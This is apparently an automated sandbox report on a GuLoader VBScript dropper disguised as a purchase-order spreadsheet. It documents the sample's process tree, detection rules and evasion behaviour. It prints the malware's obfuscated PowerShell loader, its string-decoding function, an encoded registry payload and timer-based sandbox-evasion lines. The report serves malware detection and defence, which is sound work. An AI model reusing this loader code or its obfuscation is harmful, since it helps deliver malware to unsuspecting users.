Windows Analysis Report
PO-09784893 xlsx.vbs

Overview

General Information

Sample Name:PO-09784893 xlsx.vbs
Analysis ID:755440
MD5:bfa859d9ad7b23d3606ea13f525065a7
SHA1:a1b3e395dc20bcdaa866b953a08a48d0079bace2
SHA256:ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002
Tags: GuLoader, vbs

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

  • System is w10x64
  • wscript.exe (PID: 4180 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 5132 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4412 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """[obfuscated string omitted]""";Function Thwartness4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Sallowy = $Sallowy + $HS.Substring($i, 1); } $Sallowy;}$Fictioneer0 = Thwartness4 'UdIReEDiXSk ';$Fictioneer1= Thwartness4 $Saudiarabiske;&$Fictioneer0 $Fictioneer1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1960 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 1492 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
No configs have been found
Source: PO-09784893 xlsx.vbs
Rule: WScript_Shell_PowerShell_Combo
Description: Detects malware from Middle Eastern campaign reported by Talos
Author: Florian Roth
Strings:
  • 0xa39:$s1: .CreateObject("WScript.Shell")
  • 0x3fe57:$p1: powershell.exe
  • 0x4d288:$p1: powershell.exe
Source: Process Memory Space: powershell.exe PID: 4412
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x7addd:$b2: ::FromBase64String(
  • 0x11cd57:$b2: ::FromBase64String(
  • 0x240963:$b2: ::FromBase64String(
Source: amsi64_4180.amsi.csv
Rule: WScript_Shell_PowerShell_Combo
Description: Detects malware from Middle Eastern campaign reported by Talos
Author: Florian Roth
Strings:
  • 0x1a:$s1: .CreateObject("WScript.Shell")
  • 0x72:$s1: .CreateObject("WScript.Shell")
  • 0x1e5:$p1: powershell.exe

Data Obfuscation

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """[obfuscated string omitted]
No Snort rule has matched

Source: Binary string: ek8C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.pdb source: powershell.exe, 00000003.00000002.848043775.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp
Source: powershell.exe, 00000003.00000002.836596796.0000000002CE9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000002.861091835.0000000007940000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.838609935.00000000047F1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.852449192.0000000005850000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """[obfuscated string omitted]
Source: Initial file: lysreklamerne.ShellExecute Blindtabletter, " " & chrw(34) & ap6 & chrw(34), "", "", 0
Source: C:\Windows\System32\wscript.exe, Process created: Commandline size = 5576
Source: PO-09784893 xlsx.vbs, type: SAMPLE, Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_4180.amsi.csv, type: OTHER, Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: PO-09784893 xlsx.vbs, Initial sample: Strings found which are bigger than 50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_078135D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_07810040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_078135CB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process Stats: CPU usage > 98%
Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """[obfuscated string omitted]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_01
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_daxdyhsl.wnc.ps1
Source: classification engineClassification label: mal84.expl.evad.winVBS@11/9@0/0
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Binary string: ek8C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.pdb source: powershell.exe, 00000003.00000002.848043775.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Treetise\Fejltolkningens160\Helaftensfilmens", "cQGbcQGbuk1LEn5xAZvrAqcvgfJYOfUa6wLu1+sCofeBwitXGpvrAprL6wJhUesCrspxAZvr", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Saudiarabiske = """KoAEldMedPo-CeTph", "", "", "0")
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh 
GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX (92 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX (13 occurrences)

Malware Analysis System Evasion

Source: Initial fileInitial file: do while timer-temp<sec
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8552
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4424Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000003.00000002.848528611.0000000004E65000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
Source: powershell.exe, 00000003.00000002.848528611.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ek:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: PO-09784893 xlsx.vbsBinary or memory string: Vi5 = Vi5 & "PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf5"
Source: wscript.exe, 00000000.00000003.310056094.0000023F74611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.311867684.0000023F74614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXznLUTAHANDLEX?lt?
Source: wscript.exe, 00000000.00000003.309917173.0000023F746D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf51i
Source: PO-09784893 xlsx.vbsBinary or memory string: Vi5 = Vi5 & "gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXzn"
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ek:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh 
grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelku
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh 
